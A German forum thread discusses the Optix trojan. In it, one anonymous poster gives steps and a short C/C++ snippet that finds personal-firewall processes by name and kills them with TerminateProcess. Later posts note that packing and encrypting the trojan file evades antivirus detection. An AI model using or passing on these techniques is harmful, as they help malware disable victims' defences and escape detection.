Hi Forum,
wieder ein neuer Trojaner, der Personal Firewalls killt und Viren/Trojaner-Scanner an der Nase herumführt!
http://www.astonsoft.com/optix.htm
Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge
Wen interessiert das schon? (Anonym) „was halten die Experten hier davon...?“
Nur einer von vielen, die das können!
Den Teil der Engine, der das Ausschalten übernimmt ist auf den div. Cracker-Seiten im Netz doch als Source zu haben, so kann sich jeder halbwegs c/c++ feste Bastler diesen holen und loslegen so einen Trojaner zu bauen! Die AV Hersteller hinken da immer nach!
(Anonym) Wen interessiert das schon? „Nur einer von vielen, die das können! Den Teil der Engine, der das Ausschalten...“
Wo ist da das Problem?
- PersonalFirewall deiner Wahl installieren
- schauen in den Taskmonitor deiner Windoof-Büchse
- Name des Firewalltask merken oder aufschreiben
- das alles für jede PersonalFirewall die du killen möchtest weiderholen
Jetzt exemplarisch für C/C++:
- im Programm mit den Namen die zugehörige PID's ermitteln
- und dann in Schleife mit den PID's folgendes machen
HANDLE hProcess;
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if (hProcess)
{
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if (hProcess == NULL){return FALSE;}
if (!TerminateProcess( hProcess, 1 ))
{
CloseHandle( hProcess );
return FALSE;
}
CloseHandle( hProcess );
return TRUE;
}
und damit ist die Firewall oder mehrere weg, aus, vorbei!
Harry Hunger (Anonym) „was halten die Experten hier davon...?“
McAfee erkennt ihn bei eigeschalteter Heuristik als "New BackDoor".
(Anonym) Harry Hunger „McAfee erkennt ihn bei eigeschalteter Heuristik als New BackDoor .“
auch wenn er packed u. crypted ist, so wie empfohlen?
Harry Hunger (Anonym) „was halten die Experten hier davon...?“
Packen und crypten kann man aber jeden Server, oder? (Ich hab's selber noch nicht probiert.)
(Anonym) Harry Hunger „Packen und crypten kann man aber jeden Server, oder? Ich hab s selber noch nicht...“
jede Datei!
